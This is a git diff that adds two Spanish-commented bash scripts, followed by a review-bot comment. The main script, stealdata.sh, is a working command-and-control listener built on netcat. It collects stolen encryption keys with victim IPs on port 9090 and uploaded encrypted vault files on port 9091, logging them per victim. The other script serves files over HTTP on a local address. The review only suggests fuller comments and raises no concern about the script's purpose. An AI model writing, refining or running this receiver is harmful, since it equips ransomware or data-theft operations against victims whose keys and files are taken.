movidos scripts a scripts/
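--- a/QueComanTierra/scripts/getkeys.sh
+++ b/QueComanTierra/scripts/getkeys.sh
@@ -0,0 +1,3 @@
+#!/bin/bash
+
+python3 -m http.server -b 192.168.1.5 9090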
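--- a/QueComanTierra/scripts/stealdata.sh
+++ b/QueComanTierra/scripts/stealdata.sh
@@ -0,0 +1,97 @@
+#!/bin/bash
+# C2 listener:
+# GET /?k=KEY&v=VICTIM_IP -> loggea clave
+# POST /vault/VICTIM_IP -> guarda .vault.enc en vaults/VICTIM_IP/
+
+PORT=${1:-9090}
+LOG="stolen_keys.log"
+VAULTS_DIR="vaults"
+HTTP_200=$'HTTP/1.1 200 OK\r\nContent-Length: 0\r\nConnection: close\r\n\r\n'
+
+mkdir -p "$VAULTS_DIR"
+
+handle_get() {
+local url="$1"
+local key victim ts
+
+key=$(grep -oP '(?<=k=)[^& ]+' <<< "$url")
+victim=$(grep -oP '(?<=v=)[^& ]+' <<< "$url")
+[[ -z "$key" ]] && return
+
+ts=$(date '+%Y-%m-%d %H:%M:%S')
+echo "[+] $ts victim=$victim key=$key" | tee -a "$LOG"
+}
+
+handle_post() {
+local tmpfile="$1" url="$2"
+local victim victim_dir offset body_start size ts
+
+victim=$(grep -oP '(?<=/vault/)[^/ ]+' <<< "$url")
+[[ -z "$victim" ]] && victim="unknown"
+
+victim_dir="$VAULTS_DIR/$victim"
+mkdir -p "$victim_dir"
+
+# Busca el byte-offset del separador \r\n\r\n (fin de headers HTTP)
+offset=$(grep -boa $'\r\n\r\n' "$tmpfile" 2>/dev/null | head -1 | cut -d: -f1)
+if [[ -z "$offset" ]]; then
+echo "[-] separador no encontrado en request de $victim" >&2
+return
+fi
+
+body_start=$(( offset + 4 ))
+dd if="$tmpfile" bs=1 skip="$body_start" of="$victim_dir/.vault.enc" 2>/dev/null
+
+size=$(stat -c%s "$victim_dir/.vault.enc" 2>/dev/null || echo "?")
+ts=$(date '+%Y-%m-%d %H:%M:%S')
+echo "[+] $ts vault=$victim_dir/.vault.enc size=${size}B" | tee -a "$LOG"
+}
+
+handle_connection() {
+local tmpfile="$1"
+local request_line method url
+
+request_line=$(head -1 "$tmpfile")
+method=$(awk '{print $1}' <<< "$request_line" | tr -d '\r')
+url=$(awk '{print $2}' <<< "$request_line")
+
+case "$method" in
+GET) handle_get "$url" ;;
+POST) handle_post "$tmpfile" "$url" ;;
+*) echo "[-] metodo desconocido: $method" >&2 ;;
+esac
+}
+
+key_listener() {
+local tmpfile
+tmpfile=$(mktemp)
+trap "rm -f $tmpfile" EXIT
+
+echo "[*] Keys en :9090"
+while true; do
+printf '%s' "$HTTP_200" | nc -nlvp 9090 > "$tmpfile" 2>/dev/null
+handle_get "$(awk 'NR==1{print $2}' "$tmpfile")"
+done
+}
+
+vault_listener() {
+local tmpfile
+tmpfile=$(mktemp)
+trap "rm -f $tmpfile" EXIT
+
+echo "[*] Vaults en :9091"
+while true; do
+printf '%s' "$HTTP_200" | nc -nlvp 9091 > "$tmpfile" 2>/dev/null
+local url
+url=$(awk 'NR==1{print $2}' "$tmpfile")
+handle_post "$tmpfile" "$url"
+done
+}
+
+main() {
+echo "[*] C2 iniciado. Logs en $LOG, vaults en $VAULTS_DIR/"
+key_listener &
+vault_listener
+}
+
+main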
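Review bot: The header comment at the top of stealdata.sh understates the script's network footprint: it reads as one listener, while `key_listener` opens TCP 9090 for `GET /?k=…&v=…` and `vault_listener` opens TCP 9091 for `POST /vault/<ip>`, both over plaintext HTTP and both answered with the fixed empty `HTTP_200` response. I would extend the comment with `# TCP 9090: GET /?k=KEY&v=VICTIM_IP; TCP 9091: POST /vault/VICTIM_IP; plaintext HTTP, every request gets an empty 200` and `# Writes stolen_keys.log and vaults/VICTIM_IP/.vault.enc under the working directory`, so an analyst reading the file sees the request shapes, ports and on-disk artefacts in one place. Because the key travels in the query string of an unencrypted request, proxy logs or a packet capture on the path would presumably retain it, which is relevant both for writing detection rules and for recovery during incident response.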